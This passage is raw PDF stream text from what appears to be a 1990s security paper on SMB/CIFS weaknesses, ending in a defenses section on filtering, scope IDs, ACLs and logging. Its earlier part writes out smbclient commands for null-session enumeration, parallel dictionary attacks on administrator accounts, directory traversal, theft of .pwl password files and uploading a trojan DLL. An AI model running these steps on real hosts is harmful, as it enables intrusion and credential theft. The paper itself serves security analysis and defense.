Tm (If a machine sporting the __MSBROWSE__ name is discovered, concentrate on that) Tj 1 0 0 1 54 564.9 Tm (one since it potentially has a browse-list and information about its network) Tj 1 0 0 1 54 554.4 Tm (neighbors. Plug the returned type-0x20 name in and get a share listing. Use) Tj 1 0 0 1 54 543.9 Tm (an informative debug level, avoid using NT LM dialect, hide various client) Tj 1 0 0 1 54 533.4 Tm (info, and try some standard usernames and any type-0x3 names observed along) Tj 1 0 0 1 54 522.9 Tm (the way. Many targets will accept a null password, but if a real one is) Tj 1 0 0 1 54 512.4 Tm (needed make some basic guesses such as the computername or username. The) Tj 1 0 0 1 54 501.9 Tm (hacked client accepts passwords from standard input until it gets in, gets) Tj 1 0 0 1 54 491.4 Tm (interrupted, or hits EOF.) Tj 1 0 0 1 54 470.4 Tm ( smbclient -L {TARGET} -I {ip} -d 3 -n " " -m LANMAN2 -U ADMINISTRATOR) Tj 1 0 0 1 54 459.9 Tm ( smbclient -L {TARGET} -I {ip} -d 3 -n " " -m LANMAN2 -U "") Tj 1 0 0 1 54 438.9 Tm (For the hard cases, pick a username or sharename that is likely to exist, and) Tj 1 0 0 1 54 428.4 Tm (level a common-password dictionary file at it. If you have not enabled the) Tj 1 0 0 1 54 417.9 Tm (UPPERCASE option, arrange to uppercase the dictionary first since success is) Tj 1 0 0 1 54 407.4 Tm (more likely. Debug level 0 makes it run silently until it gets in or exhausts) Tj 1 0 0 1 54 396.9 Tm (the dictionary. To test for invalid password delays, use a higher debug level) Tj 1 0 0 1 54 386.4 Tm (and manually observe the timing. A sudden speedup in access errors probably) Tj 1 0 0 1 54 375.9 Tm (indicates account lockout and that further attempts on that account won't be) Tj 1 0 0 1 54 365.4 Tm (useful for at least another half an hour or so.) Tj 1 0 0 1 54 344.4 Tm ( smbclient -L {TARGET} -I {ip} -d 0 -n " " -m LANMAN2 \\) Tj 1 0 0 1 54 333.9 Tm ( -U BACKUP < dictfile) Tj 1 0 0 1 54 312.9 Tm (Try connecting to the shares on an accessible target, testing for read/write) Tj 1 0 0 1 54 302.4 Tm (access, and exercising bugs.) Tj 1 0 0 1 54 281.4 Tm ( smbclient \\\\\\\\TARGET\\\\SNAME -n TRUSTME -m LANMAN2 -U JOEUSER -I {ip}) Tj 1 0 0 1 54 270.9 Tm ( smb: \\> dir) Tj 1 0 0 1 54 260.4 Tm ( smb: \\> md test) Tj 1 0 0 1 54 249.9 Tm ( smb: \\> rd test) Tj 1 0 0 1 54 239.4 Tm ( smb: \\> cd ..) Tj 1 0 0 1 54 228.9 Tm ( smb: \\..\\> dir) Tj 1 0 0 1 54 218.4 Tm ( smb: \\..\\> cd \\..\\..) Tj 1 0 0 1 54 207.9 Tm ( smb: \\..\\..\\> dir) Tj 1 0 0 1 54 197.4 Tm ( smb: \\..\\..\\> get config.sys -) Tj 1 0 0 1 54 186.9 Tm ( smb: \\..\\..\\> cd windows) Tj 1 0 0 1 54 176.4 Tm ( smb: \\..\\..\\windows\\> get joeuser.pwl) Tj 1 0 0 1 54 165.9 Tm ( smb: \\..\\..\\windows\\> put trojan.dll winsock.dll) Tj 1 0 0 1 54 144.9 Tm (For the *really* hard cases that impose bad-password delays but allow many) Tj 1 0 0 1 54 134.4 Tm (attempts such as NT administrator accounts, split up [and optionally convert) Tj 1 0 0 1 54 123.9 Tm (to uppercase] a large dictionary and use the multi-connection hack. A) Tj 1 0 0 1 54 113.4 Tm (convenient way to run it is inside "script", to record the details from any) Tj 1 0 0 1 54 102.9 Tm (process that successfully logs in.) Tj 1 0 0 1 54 81.9 Tm ( script logfile) Tj ET Q endstream endobj 104 0 obj 4246 endobj 99 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R102 102 0 R >> >> /Contents [ 100 0 R 103 0 R ] >> endobj 106 0 obj << /Length 107 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 107 0 obj 48 endobj 108 0 obj << /Type /Font /Name /R108 /Subtype /Type1 /BaseFont /Courier >> endobj 109 0 obj << /Length 110 0 R >> stream BT /R108 10 Tf 1 0 0 1 54 711.9 Tm ( set DOIT = "smbclient -L {TARGET} -I x.y.z.q -d 0 -n ' ' \\) Tj 1 0 0 1 54 701.4 Tm ( -m LANMAN1 -U ADMINISTRATOR") Tj 1 0 0 1 54 690.9 Tm ( $DOIT < splitdict.1 &) Tj 1 0 0 1 54 680.4 Tm ( $DOIT < splitdict.2 &) Tj 1 0 0 1 54 669.9 Tm ( $DOIT < splitdict.3 &) Tj 1 0 0 1 54 659.4 Tm ( $DOIT < splitdict.4 &) Tj 1 0 0 1 54 648.9 Tm ( ... etc, up to 10 or however many concurrent ones it can handle ...) Tj 1 0 0 1 54 627.9 Tm (Collect the results, write the report, submit the invoice...) Tj 1 0 0 1 54 606.9 Tm (Now what?) Tj 1 0 0 1 54 596.4 Tm (=========) Tj 1 0 0 1 54 575.4 Tm (Where do we go from here? If administrator-level access is gained the) Tj 1 0 0 1 54 564.9 Tm (possibilities are endless -- an account cracked during an attack is the same) Tj 1 0 0 1 54 554.4 Tm (credential needed for remote maintenance and registry editing, to install) Tj 1 0 0 1 54 543.9 Tm (hacked web pages and DLLs and drivers, modify startup files to run backdoor) Tj 1 0 0 1 54 533.4 Tm (daemons, or just wreak havoc. Access as a regular user or even guest may) Tj 1 0 0 1 54 522.9 Tm (permit such games as well. If the NT GUEST login is enabled, on most servers) Tj 1 0 0 1 54 512.4 Tm (it gets more privileges than needed unless configured otherwise. Even) Tj 1 0 0 1 54 501.9 Tm (read/write guest access to /tmp on a Samba server may be dangerous if its) Tj 1 0 0 1 54 491.4 Tm (shell users run any of hundreds of utilities that bounce critical data in and) Tj 1 0 0 1 54 480.9 Tm (out of /tmp files. This document does not address problems in other services) Tj 1 0 0 1 54 470.4 Tm (such as FTP and Web since they are exhaustively explored in other documents,) Tj 1 0 0 1 54 459.9 Tm (but one should still consider the potential effects of concerted attacks on) Tj 1 0 0 1 54 449.4 Tm (those services *and* SMB together.) Tj 1 0 0 1 54 428.4 Tm (Intruders are already scanning routinely across the customer networks of) Tj 1 0 0 1 54 417.9 Tm (large ISPs, looking for vulnerable home PCs with technically illiterate) Tj 1 0 0 1 54 407.4 Tm (owners and factory-default setups. The notoriously weak .PWL files are a) Tj 1 0 0 1 54 396.9 Tm (popular target, and woe betide those who use them to store working passwords) Tj 1 0 0 1 54 386.4 Tm (for other services. The cable-TV modem systems now coming online function) Tj 1 0 0 1 54 375.9 Tm (just like bridged ethernets, freely allowing local broadcasts and other) Tj 1 0 0 1 54 365.4 Tm (shenanigans, which can turn your next door neighbor into an unintentional) Tj 1 0 0 1 54 354.9 Tm (intruder as his '95 box literally explores its "network neighborhood". If you) Tj 1 0 0 1 54 344.4 Tm (aren't scared yet, consider this scenario: You spend a day at home doing work) Tj 1 0 0 1 54 333.9 Tm (via telecommuting. Your company is both frugal and security-aware, and has) Tj 1 0 0 1 54 323.4 Tm (provided secure connectivity tools that you can use with your regular personal) Tj 1 0 0 1 54 312.9 Tm (ISP account to access corporate files behind the firewalls. You inadvertantly) Tj 1 0 0 1 54 302.4 Tm (left filesharing "temporarily" turned on from something you were doing two) Tj 1 0 0 1 54 291.9 Tm (days ago. While you are happily SSH'ing away, someone breaks into your) Tj 1 0 0 1 54 281.4 Tm (machine via SMB and without your knowledge, sensitive company files and) Tj 1 0 0 1 54 270.9 Tm (your personal finance records are stolen, viruses planted, and your secure) Tj 1 0 0 1 54 260.4 Tm (connection apps compromised. Next time you use your SSH client, it quietly) Tj 1 0 0 1 54 249.9 Tm (spills its internal beans over the net to a stolen AOL account and within ten) Tj 1 0 0 1 54 239.4 Tm (minutes your internal corporate network is overrun. Since it appears that) Tj 1 0 0 1 54 228.9 Tm (your access credentials were involved, YOU may be held accountable. But you) Tj 1 0 0 1 54 218.4 Tm (didn't do anything, and were always careful with your passwords! A similar) Tj 1 0 0 1 54 207.9 Tm (scenario could easily occur with corporate laptops used to "get home" from) Tj 1 0 0 1 54 197.4 Tm (conferences and trade shows, which could still be a problem even if your) Tj 1 0 0 1 54 186.9 Tm (laptop is reasonably secure but the one belonging to the guy *next* to you is) Tj 1 0 0 1 54 176.4 Tm (compromised! Think about it...) Tj 1 0 0 1 54 155.4 Tm (The rest of this section wanders into a large area of blue-sky loose ends that) Tj 1 0 0 1 54 144.9 Tm (in large part outlines the limits of the author's current knowledge. Answers) Tj 1 0 0 1 54 134.4 Tm (to many of these may already be known, and if not then much is certainly left) Tj 1 0 0 1 54 123.9 Tm (for those with the time and inclination to explore and think over. Anyone is) Tj 1 0 0 1 54 113.4 Tm (free to send information concerning any of these, as well as the inevitably) Tj 1 0 0 1 54 102.9 Tm (needed corrections to other parts of this document.) Tj 1 0 0 1 54 81.9 Tm (Windows cracking tools are already starting to appear. At least one password-) Tj ET Q endstream endobj 110 0 obj 5079 endobj 105 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R108 108 0 R >> >> /Contents [ 106 0 R 109 0 R ] >> endobj 112 0 obj << /Length 113 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 113 0 obj 48 endobj 114 0 obj << /Type /Font /Name /R114 /Subtype /Type1 /BaseFont /Courier >> endobj 115 0 obj << /Length 116 0 R >> stream BT /R114 10 Tf 1 0 0 1 54 711.9 Tm (snarfing DLL is in the works for NT, as are security-targeted registry editors) Tj 1 0 0 1 54 701.4 Tm (and NTFS tools. Daemons to listen on network ports and start backdoor command) Tj 1 0 0 1 54 690.9 Tm (shells probably exist already, and if nothing else there are shareware "inetd") Tj 1 0 0 1 54 680.4 Tm (and telnet-server equivalents available now. Do not ask me where to get these) Tj 1 0 0 1 54 669.9 Tm (things, because I have no clue. Pointers, on the other hand, are always) Tj 1 0 0 1 54 659.4 Tm (welcome.) Tj 1 0 0 1 54 638.4 Tm (The \\PIPE\\LANMAN service is only one of several named-pipe services. The) Tj 1 0 0 1 54 627.9 Tm (remote registry editor starts up a new IPC TCon and opens "\\PIPE\\winreg" to do) Tj 1 0 0 1 54 617.4 Tm (its dirty. Another service type seems to be called \\MAILSLOT\\{various-things}) Tj 1 0 0 1 54 606.9 Tm (and shows up in browsing-related UDP traffic. Domain logons try to locate) Tj 1 0 0 1 54 596.4 Tm (services such as \\NET\\NETLOGON and \\NET\\GETDC450, mostly via broadcast UDP.) Tj 1 0 0 1 54 585.9 Tm (There may be many undocumented services and API calls within either class,) Tj 1 0 0 1 54 575.4 Tm (reminding us that Microsoft historically likes to hide ill-considered or) Tj 1 0 0 1 54 564.9 Tm (insecure functionality there and count on obscurity to resist attack. There) Tj 1 0 0 1 54 554.4 Tm (are also the fledgling DCE/RPC services which apparently are intended to phase) Tj 1 0 0 1 54 543.9 Tm (out named pipes as the recommended transaction backend and clearly present) Tj 1 0 0 1 54 533.4 Tm (a whole 'nother swamp to explore. If it is running, some part of RPC is) Tj 1 0 0 1 54 522.9 Tm (reachable via TCP port 135. It seems likely that some of these services) Tj 1 0 0 1 54 512.4 Tm (can be accessed even if the file/printer sharing checkbox is NOT enabled.) Tj 1 0 0 1 54 491.4 Tm (Anyone who runs vanilla SMB over the open Internet is crazy, no matter how) Tj 1 0 0 1 54 480.9 Tm (good their backend server security is. The protocol runs in the clear, and is) Tj 1 0 0 1 54 470.4 Tm (thus just as vulnerable to TCP spoofing and hijacking as any other cleartext) Tj 1 0 0 1 54 459.9 Tm (session. All it takes is one properly constructed SMB packet to make an) Tj 1 0 0 1 54 449.4 Tm (existing authenticated session do something nasty or blow open a big hole) Tj 1 0 0 1 54 438.9 Tm (that an attacker can enter through, and it doesn't even matter what the) Tj 1 0 0 1 54 428.4 Tm (server response is or how the real client handles it -- the damage is done.) Tj 1 0 0 1 54 417.9 Tm (There are already known man-in-the-middle attacks against the authentication) Tj 1 0 0 1 54 407.4 Tm (protocol. Various SMB header fields are only 16 bits, and in addition have) Tj 1 0 0 1 54 396.9 Tm (been observed to be *very* predictable especially from relatively inactive) Tj 1 0 0 1 54 386.4 Tm (servers. For instance, Samba uses the user's own UID for its SMB UID,) Tj 1 0 0 1 54 375.9 Tm (and TIDs from a quiet server vary little if at all. NT seems to rather) Tj 1 0 0 1 54 365.4 Tm (consistently assign 2048 for both initial UIDs and TIDs, and increments by) Tj 1 0 0 1 54 354.9 Tm (either 1 or 2048 for new connections. This suggests that blind TCP spoofing) Tj 1 0 0 1 54 344.4 Tm (attacks may nonetheless be effective even if an attacker cannot observe an) Tj 1 0 0 1 54 333.9 Tm (existing session.) Tj 1 0 0 1 54 312.9 Tm (One type of TCP attack involves "desynchronizing" an existing session between) Tj 1 0 0 1 54 302.4 Tm (two hosts and taking over the connection. As Laurent Joncheray's paper on the) Tj 1 0 0 1 54 291.9 Tm (subject points out, such an attack is aided by the application protocol in) Tj 1 0 0 1 54 281.4 Tm (question having some element that sends data through the TCP stream but causes) Tj 1 0 0 1 54 270.9 Tm (no change in the state of the application itself. An example is telnet) Tj 1 0 0 1 54 260.4 Tm (options -- a telnet client can send any number of "do echo" commands and the) Tj 1 0 0 1 54 249.9 Tm (end user would never be the wiser. An attacker uses this type of "null data") Tj 1 0 0 1 54 239.4 Tm (to push the TCP sequences out of each endpoint's windows, with the only side) Tj 1 0 0 1 54 228.9 Tm (effect being an "ack war" between the hosts as they desperately try to resync,) Tj 1 0 0 1 54 218.4 Tm (and eventually the attacker controls the whole connection. SMB has both an) Tj 1 0 0 1 54 207.9 Tm (echo and a session keepalive message, and it is likely that these could also) Tj 1 0 0 1 54 197.4 Tm (be used in a user-undetectable desync attack.) Tj 1 0 0 1 54 176.4 Tm (While separate TCP SMB sessions are supposed to be completely isolated from) Tj 1 0 0 1 54 165.9 Tm (each other, there is always a possibility that a server implementation could) Tj 1 0 0 1 54 155.4 Tm ("leak" or get them confused somehow. Servers generally run as a single) Tj 1 0 0 1 54 144.9 Tm (process and manage several client connections internally, but how exactly) Tj 1 0 0 1 54 134.4 Tm (does a given one internally reference the parameters associated with each?) Tj 1 0 0 1 54 123.9 Tm (The concept of "UID scanning" has been suggested, and while I personally have) Tj 1 0 0 1 54 113.4 Tm (my doubts about it there are still other various SMB fields to consider. We) Tj 1 0 0 1 54 102.9 Tm (should not discount for one moment a server giving too much credence to) Tj 1 0 0 1 54 92.4 Tm (client-settable header parameters like UID, TID, PID, MID, and maybe even) Tj 1 0 0 1 54 81.9 Tm (source TCP ports. The twelve filler bytes in TCP SMBs become relevant in) Tj ET Q endstream endobj 116 0 obj 5617 endobj 111 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R114 114 0 R >> >> /Contents [ 112 0 R 115 0 R ] >> endobj 118 0 obj << /Length 119 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 119 0 obj 48 endobj 120 0 obj << /Type /Font /Name /R120 /Subtype /Type1 /BaseFont /Courier >> endobj 121 0 obj << /Length 122 0 R >> stream BT /R120 10 Tf 1 0 0 1 54 711.9 Tm (connectionless UDP mode for sorting out session IDs, and it would be no) Tj 1 0 0 1 54 701.4 Tm (surprise at all if the right combination of data there was able to, say,) Tj 1 0 0 1 54 690.9 Tm (reference an already existing TCP session. Most server platforms seem able) Tj 1 0 0 1 54 680.4 Tm (to talk concurrently via either transport type.) Tj 1 0 0 1 54 659.4 Tm (There may be some magic hidden in the calling client name and/or the username) Tj 1 0 0 1 54 648.9 Tm (that the client passes in. Special user accounts of the form OTHERDOMAIN$ are) Tj 1 0 0 1 54 638.4 Tm (used in domain trust relationships, and recent Samba servers that at least) Tj 1 0 0 1 54 627.9 Tm (partially support domain logins have a small hook to not turn on the "guest") Tj 1 0 0 1 54 617.4 Tm (bit for this type of user login. A few remaining bits worth poking at could) Tj 1 0 0 1 54 606.9 Tm (include weaknesses in the Microsoft IP stack itself, as well as how well) Tj 1 0 0 1 54 596.4 Tm (various ill-formed service requests are handled. Sending random data to the) Tj 1 0 0 1 54 585.9 Tm (listening ports of various NT services such as RPC and DNS can apparently) Tj 1 0 0 1 54 575.4 Tm (cause them to wack out or crash, implying that genuine security holes may) Tj 1 0 0 1 54 564.9 Tm (lurk there as well. Snowing a site with bogus NMB name-registration and) Tj 1 0 0 1 54 554.4 Tm (master browser election traffic could have many interesting effects on local) Tj 1 0 0 1 54 543.9 Tm (workstations. SMB clients must conform with a rather rigid request structure,) Tj 1 0 0 1 54 533.4 Tm (but what happens if one does not? Well-known vulnerabilities such as buffer) Tj 1 0 0 1 54 522.9 Tm (overflows and trust of user-modifiable data keep recurring in recent network) Tj 1 0 0 1 54 512.4 Tm (code under numerous operating systems, and something as large and complex as) Tj 1 0 0 1 54 501.9 Tm (NT or '95 is undoubtedly no exception.) Tj 1 0 0 1 54 480.9 Tm (Besides the oft-belabored network level denial-of-service attacks possible,) Tj 1 0 0 1 54 470.4 Tm (there is also a potential attack written right into the CIFS spec. It states) Tj 1 0 0 1 54 459.9 Tm (that if a server receives a new session transport connection from a given) Tj 1 0 0 1 54 449.4 Tm (client, it MAY assume that a reboot occurred and summarily drop any old) Tj 1 0 0 1 54 438.9 Tm (existing connections with that client. Precisely what a "client" is in this) Tj 1 0 0 1 54 428.4 Tm (case is not well-defined, but implies that it is simply based on the claimed) Tj 1 0 0 1 54 417.9 Tm (client name. Only a lunatic would write a server conformant with this, as it) Tj 1 0 0 1 54 407.4 Tm (would allow anyone to remotely knock down SMB sessions all day, and sensibly) Tj 1 0 0 1 54 396.9 Tm (enough, none of the platforms mentioned herein allow this sort of nonsense.) Tj 1 0 0 1 54 386.4 Tm (Most servers rely on keepalive timeouts and network-level errors to ferret out) Tj 1 0 0 1 54 375.9 Tm (dead client connections.) Tj 1 0 0 1 54 354.9 Tm (Defenses) Tj 1 0 0 1 54 344.4 Tm (========) Tj 1 0 0 1 54 323.4 Tm (It is entirely reasonable to mentally lump CIFS in the same class as NFS, and) Tj 1 0 0 1 54 312.9 Tm (view the security aspects of both with equal skepticism. It should be fairly) Tj 1 0 0 1 54 302.4 Tm (evident by now that this stuff is a real danger, and the happy kids in Redmond) Tj 1 0 0 1 54 291.9 Tm (aren't going to be much help here. To their credit, they have provided a few) Tj 1 0 0 1 54 281.4 Tm (interesting bricks you can use when building your own walls and some of these) Tj 1 0 0 1 54 270.9 Tm (are covered in detail in numerous books and FAQs. The transport protocol is) Tj 1 0 0 1 54 260.4 Tm (also fairly easy to handle with familiar IP-level defense mechanisms, making) Tj 1 0 0 1 54 249.9 Tm (construction of that "layered defense" more feasible. It is hoped that the) Tj 1 0 0 1 54 239.4 Tm (preceding bulk of this document has increased understanding how to probe) Tj 1 0 0 1 54 228.9 Tm (networks for remaining NetBIOS-related weak spots.) Tj 1 0 0 1 54 207.9 Tm (Any text or FAQ on Windows or NT security is a good starting point for things) Tj 1 0 0 1 54 197.4 Tm (to change, particularly on servers. These will detail basics like disabling) Tj 1 0 0 1 54 186.9 Tm (or removing privileges from GUEST accounts, changing ADMINISTRATOR account) Tj 1 0 0 1 54 176.4 Tm (names and barring them from network logins, preventing remote registry) Tj 1 0 0 1 54 165.9 Tm (editing, turning off useless information-leaking services like messaging,) Tj 1 0 0 1 54 155.4 Tm (reassigning user and group privileges, configuring failed-login lockouts,) Tj 1 0 0 1 54 144.9 Tm (and dinking ACLs/ownerships on files and registry entries. Servers can be) Tj 1 0 0 1 54 134.4 Tm (equipped with batch files to invoke "net share ??? /DELETE" and disable) Tj 1 0 0 1 54 123.9 Tm (unnecessary default fileshares after a reboot. Centralized user management) Tj 1 0 0 1 54 113.4 Tm (via domain controllers may help mitigate some administrative nightmares, and) Tj 1 0 0 1 54 102.9 Tm (strong user passwords are a must although often difficult to enforce.) Tj 1 0 0 1 54 81.9 Tm (An obvious perimeter defense is packet filter rules in border routers to drop) Tj ET Q endstream endobj 122 0 obj 5295 endobj 117 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R120 120 0 R >> >> /Contents [ 118 0 R 121 0 R ] >> endobj 124 0 obj << /Length 125 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 125 0 obj 48 endobj 126 0 obj << /Type /Font /Name /R126 /Subtype /Type1 /BaseFont /Courier >> endobj 127 0 obj << /Length 128 0 R >> stream BT /R126 10 Tf 1 0 0 1 54 711.9 Tm (traffic to TCP *and* UDP ports 135 thru 139. This prevents direct NetBIOS and) Tj 1 0 0 1 54 701.4 Tm (RPC attacks from the outside, but may not block a relayed proxy connection or) Tj 1 0 0 1 54 690.9 Tm (a curious insider. Policy may dictate that a few filtering "holes" be left) Tj 1 0 0 1 54 680.4 Tm (open for remote collaborators; such things should be configured as narrowly as) Tj 1 0 0 1 54 669.9 Tm (possible, perhaps even down to specific host addresses, and policymakers) Tj 1 0 0 1 54 659.4 Tm (should understand that the data in these allowed connections can be stolen or) Tj 1 0 0 1 54 648.9 Tm (corrupted. Better would be an encrypting proxy relay or VPN of some sort.) Tj 1 0 0 1 54 627.9 Tm (If packet filtering is not an option, as at many policy-impaired sites, there) Tj 1 0 0 1 54 617.4 Tm (are still several worthwhile measures available that can help make your) Tj 1 0 0 1 54 606.9 Tm (machines "invisible" from the outside. One is to use a scope ID. These are) Tj 1 0 0 1 54 596.4 Tm (additional components of computernames that Microsoft incomprehensibly) Tj 1 0 0 1 54 585.9 Tm (recommends NOT using but provides anyway. The stated purpose is to isolate) Tj 1 0 0 1 54 575.4 Tm (groups of machines from each other in a more complete way than using different) Tj 1 0 0 1 54 564.9 Tm (workgroups. Similarly to using an obscure "domainname" under Unix YP, setting) Tj 1 0 0 1 54 554.4 Tm (all the machines at a site to use a non-obvious scope ID and keeping it a) Tj 1 0 0 1 54 543.9 Tm (secret within a site effectively provides a "site password." Any NetBIOS) Tj 1 0 0 1 54 533.4 Tm (traffic, name queries and session setup alike, must contain the exact same) Tj 1 0 0 1 54 522.9 Tm (case-sensitive scope ID or name responses aren't sent and sessions are) Tj 1 0 0 1 54 512.4 Tm (rejected. Scopes are by no means a panacea since they can leak out via human) Tj 1 0 0 1 54 501.9 Tm (vectors, and an astute attacker who observes active listeners on TCP 139 but) Tj 1 0 0 1 54 491.4 Tm (cannot obtain name info or sessions may conclude that a non-null scope ID is) Tj 1 0 0 1 54 480.9 Tm (in use and start trying to guess or social engineer for it. The scope is) Tj 1 0 0 1 54 470.4 Tm (easily viewed by doing "nbtstat -n" on a local console, so beware of wandering) Tj 1 0 0 1 54 459.9 Tm (outsiders with itchy fingers. If a site's machines are set up with scope IDs) Tj 1 0 0 1 54 449.4 Tm (by a small core group of maintainers who keep it to themselves, the end users) Tj 1 0 0 1 54 438.9 Tm (are unlikely to even notice anything different unless they specifically look) Tj 1 0 0 1 54 428.4 Tm (in the settings or spot them in packet dumps.) Tj 1 0 0 1 54 407.4 Tm (Where to set the scope name is often hidden in an obscure place. This is a) Tj 1 0 0 1 54 396.9 Tm (rough outline of where to find it on various platforms; RTFM for others:) Tj 1 0 0 1 54 375.9 Tm ( WFWG [requires restart, and happily craps into various .INI files]:) Tj 1 0 0 1 54 365.4 Tm ( run WINSETUP; Network settings / Drivers / MS TCP/IP / Setup /) Tj 1 0 0 1 54 354.9 Tm ( Advanced / Scope ID text-box) Tj 1 0 0 1 54 333.9 Tm ( WFWG alternate, less frustrating:) Tj 1 0 0 1 54 323.4 Tm ( edit SYSTEM.INI and find [NBT] section) Tj 1 0 0 1 54 312.9 Tm ( add a line with "ScopeID = XYZ") Tj 1 0 0 1 54 302.4 Tm ( note: can also add "LMHostFile = {path}" here to enable LMHOSTS) Tj 1 0 0 1 54 281.4 Tm ( W95 and NT [also requires restart]:) Tj 1 0 0 1 54 270.9 Tm ( Control panel / Network / Protocols / TCP/IP / Properties /) Tj 1 0 0 1 54 260.4 Tm ( WINS Addresses / Scope ID text-box near bottom) Tj 1 0 0 1 54 239.4 Tm ( Samba [takes effect during server run]:) Tj 1 0 0 1 54 228.9 Tm ( start "smbd" with "-i XYZ" to set the scope ID) Tj 1 0 0 1 54 207.9 Tm (Microsoft clients and servers use the scope ID exactly as given, but Samba) Tj 1 0 0 1 54 197.4 Tm (always upper-cases it and must be patched if a mixed-case one is to be used.) Tj 1 0 0 1 54 186.9 Tm (For compatibility, "nmbloookup" in the attack kit needs a similar patch,) Tj 1 0 0 1 54 176.4 Tm (although "smbclient" itself for some reason doesn't mess with the -i argument.) Tj 1 0 0 1 54 165.9 Tm (It is definitely weird that all the scope-handling hooks are already there in) Tj 1 0 0 1 54 155.4 Tm (Samba, but not very clearly documented or listed in usage\(\) messages.) Tj 1 0 0 1 54 134.4 Tm (Another easy network-level sleaze is to not supply internal servers with a) Tj 1 0 0 1 54 123.9 Tm (default IP route to the internet, and make sure they ignore ICMP redirects and) Tj 1 0 0 1 54 113.4 Tm (routing protocols. There is little reason a dedicated local fileserver would) Tj 1 0 0 1 54 102.9 Tm (ever need to interact with anything offsite, and public services such as web) Tj 1 0 0 1 54 92.4 Tm (servers should exist on different machines anyway. Packets may still reach) Tj 1 0 0 1 54 81.9 Tm (such "nonrouted" machines from the outside, but they cannot send back and TCP) Tj ET Q endstream endobj 128 0 obj 5108 endobj 123 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R126 126 0 R >> >> /Contents [ 124 0 R 127 0 R ] >> endobj 130 0 obj << /Length 131 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 131 0 obj 48 endobj 132 0 obj << /Type /Font /Name /R132 /Subtype /Type1 /BaseFont /Courier >> endobj 133 0 obj << /Length 134 0 R >> stream BT /R132 10 Tf 1 0 0 1 54 711.9 Tm (connection attempts to them simply time out. NT also seems to have some) Tj 1 0 0 1 54 701.4 Tm (rudimentary concept of its own IP packet filtering, said to offer little) Tj 1 0 0 1 54 690.9 Tm (versatility but may be worth investigating anyway [and TESTING if configured!]) Tj 1 0 0 1 54 680.4 Tm (Depending on local policy, end-user machines will probably still need to talk) Tj 1 0 0 1 54 669.9 Tm (to the internet so employees can waste time surfing; a wise policy is that) Tj 1 0 0 1 54 659.4 Tm (their machines strictly remain clients and never offer any inbound services.) Tj 1 0 0 1 54 648.9 Tm (Turning off the file and printer sharing checkboxes is the obvious first step,) Tj 1 0 0 1 54 638.4 Tm (although Microsoft stacks seem to always listen on the NetBIOS ports) Tj 1 0 0 1 54 627.9 Tm (regardless of these settings.) Tj 1 0 0 1 54 606.9 Tm (The internal protections on server shares are important, on both Microsoft) Tj 1 0 0 1 54 596.4 Tm (platforms and Samba alike. Placing public shares on separate drive partitions) Tj 1 0 0 1 54 585.9 Tm (reduces the potential damage from ".." bugs, since Microsoft servers are) Tj 1 0 0 1 54 575.4 Tm (reasonably good about not letting shares cross filesystem boundaries. If file) Tj 1 0 0 1 54 564.9 Tm (ACLs and modes are available, USE THEM so that any normal user [or a virus she) Tj 1 0 0 1 54 554.4 Tm (inadvertantly runs] would never be able to write to, say, directories full of) Tj 1 0 0 1 54 543.9 Tm (common system utilities. Making entire shares read-only if possible is sound,) Tj 1 0 0 1 54 533.4 Tm (or if *someone* needs to write to them, separate and closely-held mainenance) Tj 1 0 0 1 54 522.9 Tm (accounts should only own the files and not have any administrative privileges.) Tj 1 0 0 1 54 512.4 Tm (While the magic [homes] Samba feature may be useful in some environments,) Tj 1 0 0 1 54 501.9 Tm (consider carefully if the arguably free-n-easy way it works may be too lax for) Tj 1 0 0 1 54 491.4 Tm (yours. A strategy worth considering is building a Samba server with custom) Tj 1 0 0 1 54 480.9 Tm (getpwent\(\) routines that dig base user entries out of a file other than) Tj 1 0 0 1 54 470.4 Tm (/etc/passwd, which makes a cracked filesharing password considerably less) Tj 1 0 0 1 54 459.9 Tm (useful against other daemons on the server machine.) Tj 1 0 0 1 54 438.9 Tm (The logging problem is a pain in the butt. Most servers that log anything) Tj 1 0 0 1 54 428.4 Tm (just save the calling client's name, which is hardly useful since it can be) Tj 1 0 0 1 54 417.9 Tm (arbitrarily set. Running a separate network monitor on an unswitched DMZ) Tj 1 0 0 1 54 407.4 Tm (segment and looking for certain inbound traffic is one way to centrally cover) Tj 1 0 0 1 54 396.9 Tm (a motley assortment of problematic machines. Stock Microsoft platforms simply) Tj 1 0 0 1 54 386.4 Tm (cannot log client IP addresses at all, a possible albeit lame rationale being) Tj 1 0 0 1 54 375.9 Tm (that CIFS runs over several different kind of transports and they'd all have) Tj 1 0 0 1 54 365.4 Tm (to be accomodated somehow. Some kind of batch job to periodically wake up and) Tj 1 0 0 1 54 354.9 Tm (snapshot a "netstat -a" to a logfile may help detect attacks, or by now there) Tj 1 0 0 1 54 344.4 Tm (may be some third-party DLLs available that provide better logging and alarms.) Tj 1 0 0 1 54 333.9 Tm (Samba deals more closely with IP addresses but still makes the administrator) Tj 1 0 0 1 54 323.4 Tm (jump through hoops to usefully log things. Under the default debug level of) Tj 1 0 0 1 54 312.9 Tm (1 only successful non-IPC tree connects are logged. The code also includes) Tj 1 0 0 1 54 302.4 Tm (an IP-based access control module ripped right out of Wietse Venema's tcp) Tj 1 0 0 1 54 291.9 Tm (wrappers, and can be set up to deny tree connects from all but known hosts) Tj 1 0 0 1 54 281.4 Tm (and subnets. The allow/deny access control entries reside in lib/smb.conf,) Tj 1 0 0 1 54 270.9 Tm (configured globally and/or per share entry, but they only apply to TCons and) Tj 1 0 0 1 54 260.4 Tm (have no effect on the underlying TCP connection itself. Using them may) Tj 1 0 0 1 54 249.9 Tm (nevertheless gain some peace of mind; see the documentation for serving) Tj 1 0 0 1 54 239.4 Tm 